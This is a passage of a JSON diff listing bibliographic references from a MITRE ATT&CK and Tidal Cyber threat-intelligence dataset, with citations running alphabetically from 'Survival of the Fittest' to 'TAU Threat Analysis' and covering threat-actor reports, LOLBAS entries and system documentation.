"Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2013-08-12T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" + ], + "source": "MITRE", + "title": "Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]" + }, + "related": [], + "uuid": "d38bdb47-1a8d-43f8-b7ed-dfa5e430ac2f", + "value": "Moran 2013" + }, + { + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2015-10-07T00:00:00Z", + "refs": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/" + ], + "source": "MITRE", + "title": "Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles" + }, + "related": [], + "uuid": "de7003cb-5127-4fd7-9475-d69e0d7f5cc8", + "value": "Dell Threat Group 2889" + }, + { + "description": "Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.", + "meta": { + "date_accessed": "2022-09-21T00:00:00Z", + "date_published": "2022-08-17T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping" + ], + "source": "MITRE", + "title": "Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors" + }, + "related": [], + "uuid": "7b3fda0b-d327-4f02-bebe-2b8974f9959d", + "value": "Mandiant UNC3890 Aug 2022" + }, + { + "description": "Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock. (2021, December 6). Suspected Russian Activity Targeting Government and Business Entities Around the Globe. Retrieved April 15, 2022.", + "meta": { + "date_accessed": "2022-04-15T00:00:00Z", + "date_published": "2021-12-06T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/russian-targeting-gov-business" + ], + "source": "MITRE", + "title": "Suspected Russian Activity Targeting Government and Business Entities Around the Globe" + }, + "related": [], + "uuid": "f45a0551-8d49-4d40-989f-659416dc25ec", + "value": "Suspected Russian Activity Targeting Government and Business Entities Around the Globe" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2024, February 26). SVR Cyber Actors Adapt Tactics for Initial Cloud Access. Retrieved March 1, 2024.", + "meta": { + "date_accessed": "2024-03-01T00:00:00Z", + "date_published": "2024-02-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a" + ], + "source": "Tidal Cyber", + "title": "SVR Cyber Actors Adapt Tactics for Initial Cloud Access" + }, + "related": [], + "uuid": "e9e08eca-1e01-4ff0-a8ef-49ecf66aaf3d", + "value": "U.S. CISA APT29 Cloud Access" + }, + { + "description": "Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-03-12T00:00:00Z", + "refs": [ + "https://www.recordedfuture.com/turla-apt-infrastructure/" + ], + "source": "MITRE", + "title": "Swallowing the Snake’s Tail: Tracking Turla Infrastructure" + }, + "related": [], + "uuid": "73aaff33-5a0e-40b7-a089-77ac57da8dca", + "value": "Recorded Future Turla Infra 2020" + }, + { + "description": "Gerend, J. et al.. (2017, October 16). sxstrace. Retrieved April 26, 2021.", + "meta": { + "date_accessed": "2021-04-26T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/administration/windows-commands/sxstrace" + ], + "source": "MITRE", + "title": "sxstrace" + }, + "related": [], + "uuid": "a0a753c6-7d8c-4ad9-91a9-a2c385178054", + "value": "Microsoft Sxstrace" + }, + { + "description": "Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.", + "meta": { + "date_accessed": "2016-01-10T00:00:00Z", + "date_published": "2012-01-12T00:00:00Z", + "refs": [ + "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards" + ], + "source": "MITRE", + "title": "Sykipot variant hijacks DOD and Windows smart cards" + }, + "related": [], + "uuid": "1a96544f-5b4e-4e1a-8db0-a989df9e4aaa", + "value": "Alienvault Sykipot DOD Smart Cards" + }, + { + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.", + "meta": { + "date_accessed": "2018-05-22T00:00:00Z", + "date_published": "2018-05-07T00:00:00Z", + "refs": [ + "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + ], + "source": "MITRE", + "title": "SynAck targeted ransomware uses the Doppelgänging technique" + }, + "related": [], + "uuid": "d9f0af0f-8a65-406b-9d7e-4051086ef301", + "value": "SecureList SynAck Doppelgänging May 2018" + }, + { + "description": "LOLBAS. (2018, May 25). SyncAppvPublishingServer.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/" + ], + "source": "Tidal Cyber", + "title": "SyncAppvPublishingServer.exe" + }, + "related": [], + "uuid": "ce371df7-aab6-4338-9491-656481cb5601", + "value": "SyncAppvPublishingServer.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Syncappvpublishingserver.vbs. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/" + ], + "source": "Tidal Cyber", + "title": "Syncappvpublishingserver.vbs" + }, + "related": [], + "uuid": "adb09226-894c-4874-a2e3-fb2c6de30173", + "value": "Syncappvpublishingserver.vbs - LOLBAS Project" + }, + { + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2015-09-15T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/synful-knock-acis" + ], + "source": "MITRE", + "title": "SYNful Knock - A Cisco router implant - Part I" + }, + "related": [], + "uuid": "1f6eaa98-9184-4341-8634-5512a9c632dd", + "value": "Mandiant - Synful Knock" + }, + { + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2021-08-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + ], + "source": "MITRE", + "title": "Sysmon Event ID 9" + }, + "related": [], + "uuid": "b24440b2-43c3-46f2-be4c-1147f6acfe57", + "value": "Sysmon EID 9" + }, + { + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "meta": { + "date_accessed": "2017-12-13T00:00:00Z", + "date_published": "2017-05-22T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/sysinternals/downloads/sysmon" + ], + "source": "MITRE", + "title": "Sysmon v6.20" + }, + "related": [], + "uuid": "41cd9e06-a56c-4b68-948c-efc497a8d0dc", + "value": "Microsoft Sysmon v6 May 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Syssetup.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Syssetup/" + ], + "source": "Tidal Cyber", + "title": "Syssetup.dll" + }, + "related": [], + "uuid": "3bb7027f-7cbb-47e7-8cbb-cf45604669af", + "value": "Syssetup.dll - LOLBAS Project" + }, + { + "description": "Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.", + "meta": { + "date_accessed": "2022-03-31T00:00:00Z", + "refs": [ + "https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web" + ], + "source": "MITRE", + "title": "System and kernel extensions in macOS" + }, + "related": [], + "uuid": "e5c4974d-dfd4-4c1c-ba4c-b6fb276effac", + "value": "System and kernel extensions in macOS" + }, + { + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "http://man7.org/linux/man-pages/man1/systemd.1.html" + ], + "source": "MITRE", + "title": "systemd(1) - Linux manual page" + }, + "related": [], + "uuid": "e9a58efd-8de6-40c9-9638-c642311d6a07", + "value": "Linux man-pages: systemd January 2014" + }, + { + "description": "freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.", + "meta": { + "date_accessed": "2022-06-15T00:00:00Z", + "refs": [ + "https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html" + ], + "source": "MITRE", + "title": "systemd-journald.service" + }, + "related": [], + "uuid": "5ded9060-9a23-42dc-b13b-15e4e3ccabf9", + "value": "FreeDesktop Journal" + }, + { + "description": "Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021.", + "meta": { + "date_accessed": "2021-02-23T00:00:00Z", + "refs": [ + "http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html" + ], + "source": "MITRE", + "title": "systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown" + }, + "related": [], + "uuid": "6be16aba-a37f-49c4-9a36-51d2676f64e6", + "value": "Ubuntu Manpage systemd rc" + }, + { + "description": "Free Desktop. (n.d.). systemd.service — Service unit configuration. Retrieved March 20, 2023.", + "meta": { + "date_accessed": "2023-03-20T00:00:00Z", + "refs": [ + "https://www.freedesktop.org/software/systemd/man/systemd.service.html" + ], + "source": "MITRE", + "title": "systemd.service — Service unit configuration" + }, + "related": [], + "uuid": "cae49a7a-db3b-5202-ba45-fbfa98b073c9", + "value": "freedesktop systemd.service" + }, + { + "description": "Freedesktop.org. (n.d.). systemd.service — Service unit configuration. Retrieved March 16, 2020.", + "meta": { + "date_accessed": "2020-03-16T00:00:00Z", + "refs": [ + "https://www.freedesktop.org/software/systemd/man/systemd.service.html" + ], + "source": "MITRE", + "title": "systemd.service — Service unit configuration" + }, + "related": [], + "uuid": "43bae447-d2e3-4b53-b17b-12a0b54ac604", + "value": "Systemd Service Units" + }, + { + "description": "Man7. (n.d.). systemd-sleep.conf(5) — Linux manual page. Retrieved June 7, 2023.", + "meta": { + "date_accessed": "2023-06-07T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html" + ], + "source": "MITRE", + "title": "systemd-sleep.conf(5) — Linux manual page" + }, + "related": [], + "uuid": "9537f6f9-1521-5c21-b14f-ac459a2d1b70", + "value": "systemdsleep Linux" + }, + { + "description": "Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-09-29T00:00:00Z", + "refs": [ + "https://www.freedesktop.org/wiki/Software/systemd/" + ], + "source": "MITRE", + "title": "systemd System and Service Manager" + }, + "related": [], + "uuid": "940dcbbe-45d3-4f36-8d48-d606d41a679e", + "value": "Freedesktop.org Linux systemd 29SEP2018" + }, + { + "description": "archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.", + "meta": { + "date_accessed": "2020-10-12T00:00:00Z", + "date_published": "2020-08-11T00:00:00Z", + "refs": [ + "https://wiki.archlinux.org/index.php/Systemd/Timers" + ], + "source": "MITRE", + "title": "systemd/Timers" + }, + "related": [], + "uuid": "670f02f1-3927-4f38-aa2b-9ca0d8cf5b8e", + "value": "archlinux Systemd Timers Aug 2020" + }, + { + "description": "Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.", + "meta": { + "date_accessed": "2016-04-08T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb491007.aspx" + ], + "source": "MITRE", + "title": "Systeminfo" + }, + "related": [], + "uuid": "5462ba66-6e26-41c2-bc28-6c19085d4469", + "value": "TechNet Systeminfo" + }, + { + "description": "SS64. (n.d.). system_profiler. Retrieved March 11, 2022.", + "meta": { + "date_accessed": "2022-03-11T00:00:00Z", + "refs": [ + "https://ss64.com/osx/system_profiler.html" + ], + "source": "MITRE", + "title": "system_profiler" + }, + "related": [], + "uuid": "2a3c5216-b153-4d89-b0b1-f32af3aa83d0", + "value": "Peripheral Discovery macOS" + }, + { + "description": "Microsoft. (n.d.). System Time. Retrieved November 25, 2016.", + "meta": { + "date_accessed": "2016-11-25T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/ms724961.aspx" + ], + "source": "MITRE", + "title": "System Time" + }, + "related": [], + "uuid": "5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec", + "value": "MSDN System Time" + }, + { + "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2021-09-03T00:00:00Z", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md" + ], + "source": "MITRE", + "title": "T1562.002 - Disable Windows Event Logging" + }, + "related": [], + "uuid": "e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1", + "value": "T1562.002_redcanaryco" + }, + { + "description": "Grunzweig, J. and Miller-Osborn, J.. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.", + "meta": { + "date_accessed": "2016-04-15T00:00:00Z", + "date_published": "2016-02-04T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/" + ], + "source": "MITRE", + "title": "T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques" + }, + "related": [], + "uuid": "d7eefe85-86cf-4b9d-bf70-f16c5a0227cc", + "value": "Palo Alto T9000 Feb 2016" + }, + { + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "meta": { + "date_accessed": "2019-10-02T00:00:00Z", + "date_published": "2018-03-27T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA18-086A" + ], + "source": "MITRE", + "title": "TA18-068A Brute Force Attacks Conducted by Cyber Actors" + }, + "related": [], + "uuid": "d9992f57-8ff3-432f-b445-937ff4a6ebf9", + "value": "US-CERT TA18-068A 2018" + }, + { + "description": "Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2020-11-23T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader" + ], + "source": "MITRE", + "title": "TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader" + }, + "related": [], + "uuid": "f72685de-c775-41c4-94ed-45fd7f873a1d", + "value": "Proofpoint TA416 November 2020" + }, + { + "description": "Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2020-11-18T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/" + ], + "source": "MITRE", + "title": "TA505: A Brief History of Their Time" + }, + "related": [], + "uuid": "45e0b869-5447-491b-9e8b-fbf63c62f5d6", + "value": "NCC Group TA505" + }, + { + "description": "Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "date_published": "2018-07-19T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" + ], + "source": "MITRE", + "title": "TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT" + }, + "related": [], + "uuid": "4f92af77-0428-4c67-8eec-98ecc3b55630", + "value": "ProofPoint SettingContent-ms July 2018" + }, + { + "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.", + "meta": { + "date_accessed": "2020-05-29T00:00:00Z", + "date_published": "2020-04-14T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" + ], + "source": "MITRE", + "title": "TA505 Continues to Infect Networks With SDBbot RAT" + }, + "related": [], + "uuid": "bcef8bf8-5fc2-4921-b920-74ef893b8a27", + "value": "IBM TA505 April 2020" + }, + { + "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.", + "meta": { + "date_accessed": "2020-05-29T00:00:00Z", + "date_published": "2019-10-16T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" + ], + "source": "MITRE", + "title": "TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader" + }, + "related": [], + "uuid": "711ea2b3-58e2-4b38-aa71-877029c12e64", + "value": "Proofpoint TA505 October 2019" + }, + { + "description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2018-06-08T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times" + ], + "source": "MITRE", + "title": "TA505 shifts with the times" + }, + "related": [], + "uuid": "e48dec7b-5635-4ae0-b0db-229660806c06", + "value": "Proofpoint TA505 June 2018" + }, + { + "description": "Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2019-08-27T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html" + ], + "source": "MITRE", + "title": "TA505: Variety in Use of ServHelper and FlawedAmmyy" + }, + "related": [], + "uuid": "460758ea-ed3e-4e9b-ba2e-97c9d42154a4", + "value": "TrendMicro TA505 Aug 2019" + }, + { + "description": "Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "date_published": "2021-01-07T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/" + ], + "source": "MITRE", + "title": "TA551: Email Attack Campaign Switches from Valak to IcedID" + }, + "related": [], + "uuid": "8e34bf1e-86ce-4d52-a6fa-037572766e99", + "value": "Unit 42 TA551 Jan 2021" + }, + { + "description": "IBM X-Force. (2023, May 30). TA577 OneNote Malspam Results in QakBot Deployment. Retrieved January 24, 2024.", + "meta": { + "date_accessed": "2024-01-24T00:00:00Z", + "date_published": "2023-05-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://exchange.xforce.ibmcloud.com/threats/guid:7f0659d266174b9a9ba40c618b853782" + ], + "source": "Tidal Cyber", + "title": "TA577 OneNote Malspam Results in QakBot Deployment" + }, + "related": [], + "uuid": "30ebffb8-be3e-4094-a41b-882aec9e14b8", + "value": "IBM TA577 OneNote Malspam" + }, + { + "description": "Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-08T00:00:00Z", + "refs": [ + "https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf" + ], + "source": "MITRE", + "title": "Tactics, Techniques, and Procedures" + }, + "related": [], + "uuid": "ee56d7a3-32c4-4f75-ad0c-73164a83b5a6", + "value": "Cobalt Strike TTPs Dec 2017" + }, + { + "description": "Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.", + "meta": { + "date_accessed": "2022-04-06T00:00:00Z", + "date_published": "2020-08-19T00:00:00Z", + "refs": [ + "https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK" + ], + "source": "MITRE", + "title": "Taiwan says China behind cyberattacks on government agencies, emails" + }, + "related": [], + "uuid": "77293f88-e336-4786-b042-7f0080bbff32", + "value": "Reuters Taiwan BlackTech August 2020" + }, + { + "description": "Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx" + ], + "source": "MITRE", + "title": "Taking a Snapshot and Viewing Processes" + }, + "related": [], + "uuid": "6e4b1921-99b2-41ce-a7dc-72c05b17c682", + "value": "Microsoft Process Snapshot" + }, + { + "description": "Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-05-25T00:00:00Z", + "refs": [ + "https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/" + ], + "source": "MITRE", + "title": "Taking TeamTNT's Docker Images Offline" + }, + "related": [], + "uuid": "5908b04b-dbca-4fd8-bacc-141ef15546a1", + "value": "Lacework TeamTNT May 2021" + }, + { + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2017-12-11T00:00:00Z", + "refs": [ + "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" + ], + "source": "MITRE", + "title": "Tall Tales of Hunting with TLS/SSL Certificates" + }, + "related": [], + "uuid": "2b341021-897e-4e3f-9141-825d3501c498", + "value": "Splunk Kovar Certificates 2017" + }, + { + "description": "Dragos. (null). TALONITE. Retrieved February 25, 2021.", + "meta": { + "date_accessed": "2021-02-25T00:00:00Z", + "refs": [ + "https://www.dragos.com/threat/talonite/" + ], + "source": "MITRE", + "title": "TALONITE" + }, + "related": [], + "uuid": "f8ef1920-a4ad-4d65-b9de-8357d75f6929", + "value": "Dragos TALONITE" + }, + { + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + ], + "source": "MITRE", + "title": "Talos Sodinokibi April 2019" + }, + "related": [], + "uuid": "fb948877-da2b-4abd-9d57-de9866b7a7c2", + "value": "Talos Sodinokibi April 2019" + }, + { + "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.", + "meta": { + "date_accessed": "2019-06-07T00:00:00Z", + "date_published": "2018-12-24T00:00:00Z", + "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + ], + "source": "MITRE", + "title": "Tampering with Windows Event Tracing: Background, Offense, and Defense" + }, + "related": [], + "uuid": "cd1a7b9a-183f-4acf-95c8-14d9475d0551", + "value": "Medium Event Tracing Tampering 2018" + }, + { + "description": "LOLBAS. (2023, January 30). Tar.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-01-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tar/" + ], + "source": "Tidal Cyber", + "title": "Tar.exe" + }, + "related": [], + "uuid": "e5f54ded-3ec1-49c1-9302-6b9f372d5015", + "value": "Tar.exe - LOLBAS Project" + }, + { + "description": "Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2019-01-24T00:00:00Z", + "refs": [ + "https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection" + ], + "source": "MITRE", + "title": "Targeted Attacks Abusing Google Cloud Platform Open Redirection" + }, + "related": [], + "uuid": "18efeffc-c47b-46ad-8e7b-2eda30a406f0", + "value": "Netskope GCP Redirection" + }, + { + "description": "AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-06-23T00:00:00Z", + "refs": [ + "http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus" + }, + "related": [], + "uuid": "bbc66e9f-98f9-4e34-b568-2833ea536f2e", + "value": "AhnLab Andariel Subgroup of Lazarus June 2018" + }, + { + "description": "Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.", + "meta": { + "date_accessed": "2022-01-26T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/" + ], + "source": "MITRE", + "title": "Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques" + }, + "related": [], + "uuid": "dfd168c0-40da-4402-a123-963eb8e2125a", + "value": "dharma_ransomware" + }, + { + "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.", + "meta": { + "date_accessed": "2023-05-24T00:00:00Z", + "refs": [ + "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/" + ], + "source": "MITRE", + "title": "Targeted SSL Stripping Attacks Are Real" + }, + "related": [], + "uuid": "714528e8-0f2e-50a3-93c0-c560a34ba973", + "value": "Targeted SSL Stripping Attacks Are Real" + }, + { + "description": "Council on Foreign Relations. (2020, November 28). Targeting of companies involved in vaccine development. Retrieved October 30, 2023.", + "meta": { + "date_accessed": "2023-10-30T00:00:00Z", + "date_published": "2020-11-28T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cfr.org/cyber-operations/targeting-companies-involved-vaccine-development" + ], + "source": "Tidal Cyber", + "title": "Targeting of companies involved in vaccine development" + }, + "related": [], + "uuid": "2ec4f877-de9a-44bf-8236-20d7ecd631df", + "value": "CFR Vaccine Development Threats" + }, + { + "description": "Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2022-04-12T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/" + ], + "source": "MITRE", + "title": "Tarrask malware uses scheduled tasks for defense evasion" + }, + "related": [], + "uuid": "87682623-d1dd-4ee8-ae68-b08be5113e3e", + "value": "Tarrask scheduled task" + }, + { + "description": "Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.", + "meta": { + "date_accessed": "2015-12-23T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb491010.aspx" + ], + "source": "MITRE", + "title": "Tasklist" + }, + "related": [], + "uuid": "2c09561a-02ee-4948-9745-9d6c8eb2881d", + "value": "Microsoft Tasklist" + }, + { + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + "source": "MITRE", + "title": "Tasks" + }, + "related": [], + "uuid": "def6601b-67e6-41e5-bcf3-9c701b86fd10", + "value": "Microsoft Tasks" + }, + { + "description": "Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.", + "meta": { + "date_accessed": "2016-06-08T00:00:00Z", + "date_published": "2005-01-21T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc785125.aspx" + ], + "source": "MITRE", + "title": "Task Scheduler and security" + }, + "related": [], + "uuid": "3a6d08ba-d79d-46f7-917d-075a98c59228", + "value": "TechNet Task Scheduler Security" + }, + { + "description": "Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-06-29T00:00:00Z", + "refs": [ + "https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html" + ], + "source": "MITRE", + "title": "TAU Threat Analysis: Bundlore (macOS) mm-install-macos" + }, + "related": [], + "uuid": 